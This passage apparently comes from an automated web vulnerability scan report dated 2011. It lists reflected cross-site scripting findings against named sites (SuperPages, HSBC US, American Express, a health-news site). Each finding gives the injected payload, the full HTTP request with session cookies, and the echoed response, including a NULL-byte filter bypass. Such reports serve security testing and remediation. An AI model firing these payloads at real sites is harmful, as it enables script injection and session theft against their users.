User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:36 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:36GMT
Content-Length: 59492
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:36 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks43ba5"><img Src=a Onerror=alert(1)>935e0c29137 in Yellow Pages by SuperPages">
...[SNIP]...

1.527. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a was submitted in the REST URL parameter 2. This input was echoed as 4500c<img src=a onerror=alert(1)>46b2d68491a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:45 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:46GMT
Content-Length: 58480
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:46 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a in Y
...[SNIP]...
<h1>Select a State to view Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a Listings </h1>
...[SNIP]...

1.528. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf72b<img src=a onerror=alert(1)>ee7e8ccc6d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks?bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:06 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:06GMT
Content-Length: 59798
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:06 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 i
...[SNIP]...
<h1>Select a State to view Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 Listings </h1>
...[SNIP]...

1.529. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41c54"><img src=a onerror=alert(1)>2bfa6c73542 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks?41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:55 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:06:56GMT
Content-Length: 60810
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:56 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks?41c54"><img Src=a Onerror=alert(1)>2bfa6c73542=1 in Yellow Pages by SuperPages">
...[SNIP]...

1.530. http://www.thehealthreport.net/ac-usap.php [sub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thehealthreport.net
Path:   /ac-usap.php

Issue detail

The value of the sub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e765"><script>alert(1)</script>4ba170077e5 was submitted in the sub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ac-usap.php?sub=xyp7e765"><script>alert(1)</script>4ba170077e5 HTTP/1.1
Host: www.thehealthreport.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748883062&k=banks&l=Dallas%2c+TX
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:01 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Connection: keep-alive
Content-Length: 48515

...

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<!-- saved from url=(0034)http://www.channel5healthnews.net/ -->
<H
...[SNIP]...
<A href="http://ziggymedia.go2cloud.org/aff_c?offer_id=6&aff_id=1001&source=xyp7e765"><script>alert(1)</script>4ba170077e5-dp"
target=_blank>
...[SNIP]...

1.531. http://www.us.hsbc.com/1/2/3 [hp_pref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3

Issue detail

The value of the hp_pref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74bf5"%3balert(1)//00c0d1ff9 was submitted in the hp_pref parameter. This input was echoed as 74bf5";alert(1)//00c0d1ff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3?command=makeThisMyHome&hp_pref=r74bf5"%3balert(1)//00c0d1ff9 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:06 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:07 GMT
Vary: User-Agent,Cookie
Content-Length: 5895
Set-Cookie: USIB2G=00005EK9jF4bpOMzFrUSkh3Dd5x:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
<script language="javascript">
       var date = new Date();
       date.setTime(date.getTime()+(365*24*60*60*1000));
       var expires = "; expires="+date.toGMTString();
       document.cookie = "hp_pref"+"="+"r74bf5";alert(1)//00c0d1ff9"+expires+"; path=/";


               window.location="null"
</script>
...[SNIP]...

1.532. http://www.us.hsbc.com/1/2/3/hsbcpremier/apply [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/apply

Issue detail

The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 was submitted in the code parameter. This input was echoed as afe63"style="x:expression(alert(1))"19a95eb25d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /1/2/3/hsbcpremier/apply?code=MEP0002714afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:39 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:39 GMT
Vary: User-Agent,Cookie
Set-Cookie: USIB2G=0000Dhol7ilZ0q0aTb173umEJKd:14k1jbteq; Path=/
Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:38 GMT; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 34486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv
...[SNIP]...
-LEFT: 20px; PADDING-TOP: 4px; font-family: Times New Roman, Arial !important; FONT-WEIGHT: bold;" class="redbox" href="https://www.us.hsbc.com/1/2/3/hsbcpremier/apply/start?custype=no&&code=MEP0002714afe63"style="x:expression(alert(1))"19a95eb25d7">
...[SNIP]...

1.533. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/prom/jan-11

Issue detail

The value of the code request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7758e"%3balert(1)//c523249deae was submitted in the code parameter. This input was echoed as 7758e";alert(1)//c523249deae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM00016997758e"%3balert(1)//c523249deae&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:11 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:11 GMT
Vary: User-Agent,Cookie
Content-Length: 26880
Set-Cookie: USIB2G=0000JbZ447P9hCR84of1XRxrbLB:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
ars = {
        basePath: "/1/PA_1_083Q9FJ08A002FBP5S00000000/content/usshared/Premier/Promotions/2011/Jan/",
        contactUrl: "https://www.us.hsbc.com/1/2/3/hsbcpremier/prom/contact-us?code=CSM00016997758e";alert(1)//c523249deae&WT.ac=HBUS_CSM00016997758e";alert(1)//c523249deae&HiddenMandatoryFields.ProductionPromotionCode=CSM00016997758e";alert(1)//c523249deae",
           deepLinkID: "",
           xmlPath:"/1/PA_1_083Q9FJ08A002FBP5S000000
...[SNIP]...

1.534. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/prom/jan-11

Issue detail

The value of the code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eae3f'%3balert(1)//f4fc58b391e was submitted in the code parameter. This input was echoed as eae3f';alert(1)//f4fc58b391e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM0001699eae3f'%3balert(1)//f4fc58b391e&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:12 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:12 GMT
Vary: User-Agent,Cookie
Content-Length: 26880
Set-Cookie: USIB2G=0000bKlIRzRrrCPXuxZazS0H-Ki:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
yes,menubar=yes,resizable=yes,scrollbars=yes,toolbar=yes,width=470,height=570,screenX=0,left=0,screenY=0,top=0";
   window.open( 'https://www.us.hsbc.com/1/2/3/hsbcpremier/prom/contact-us?code=CSM0001699eae3f';alert(1)//f4fc58b391e&WT.ac=HBUS_CSM0001699eae3f';alert(1)//f4fc58b391e&HiddenMandatoryFields.ProductionPromotionCode=CSM0001699eae3f';alert(1)//f4fc58b391e','_blank', features );
}
</script>
...[SNIP]...

1.535. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/prom/jan-11

Issue detail

The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f was submitted in the code parameter. This input was echoed as 41ec8"style="x:expression(alert(1))"fd17a07d03f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM000169941ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:10 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:10 GMT
Vary: User-Agent,Cookie
Content-Length: 27260
Set-Cookie: USIB2G=0000NYkxlYtKgvFgWjsyZ7uTMLY:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
<a id="begin_now" href="http://www.us.hsbc.com/1/2/3/hsbcpremier/apply?code=CSM000169941ec8"style="x:expression(alert(1))"fd17a07d03f" title="Begin Now">
...[SNIP]...

1.536. http://www201.americanexpress.com/business-credit-cards/ [inav parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The value of the inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52396"%3balert(1)//a663c189a2b was submitted in the inav parameter. This input was echoed as 52396";alert(1)//a663c189a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?inav=footer_small_business_credit_cards52396"%3balert(1)//a663c189a2b HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:24 GMT
Server: IBM_HTTP_Server
Set-Cookie: homepage=a;Expires=Thu, 10-Feb-2011 14:15:24 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 71911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>OPEN from Amer
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "inav=footer_small_business_credit_cards52396";alert(1)//a663c189a2b";
   </script>
...[SNIP]...

1.537. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15a54"%3balert(1)//fd4c9d0046f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15a54";alert(1)//fd4c9d0046f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?15a54"%3balert(1)//fd4c9d0046f=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:29 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742109623898; path=/; expires=Sun, 07-Feb-16 14:08:29 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000kt9fEePAKN3zFZ84FN4F_Dj:1115nbtvb;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:29 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 71726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>OPEN from Amer
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "15a54";alert(1)//fd4c9d0046f=1";
   </script>
...[SNIP]...

1.538. http://www201.americanexpress.com/business-credit-cards/ [view-all-business-cards&inav parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The value of the view-all-business-cards&inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44aa5"%3balert(1)//7dd45ad0d89 was submitted in the view-all-business-cards&inav parameter. This input was echoed as 44aa5";alert(1)//7dd45ad0d89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?view-all-business-cards&inav=menu_cards_sbc_viewallcards44aa5"%3balert(1)//7dd45ad0d89 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:11 GMT
Server: IBM_HTTP_Server
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:15:11 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 71876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>OPEN from Amer
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "inav=menu_cards_sbc_viewallcards44aa5";alert(1)//7dd45ad0d89";
   </script>
...[SNIP]...

1.539. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d7597"><script>alert(1)</script>c7d4c5b0106 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7597"><script>alert(1)</script>c7d4c5b0106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /business-credit-cards/business-credit-cards?%00d7597"><script>alert(1)</script>c7d4c5b0106=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:36 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742116979490; path=/; expires=Sun, 07-Feb-16 14:08:36 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000HiS-OjEOSZC4JaXS7Qm_PPe:1115nbtvb;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:36 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<link rel="canonical" href="http://www201.americanexpress.com/42002?.d7597"><script>alert(1)</script>c7d4c5b0106=1" />
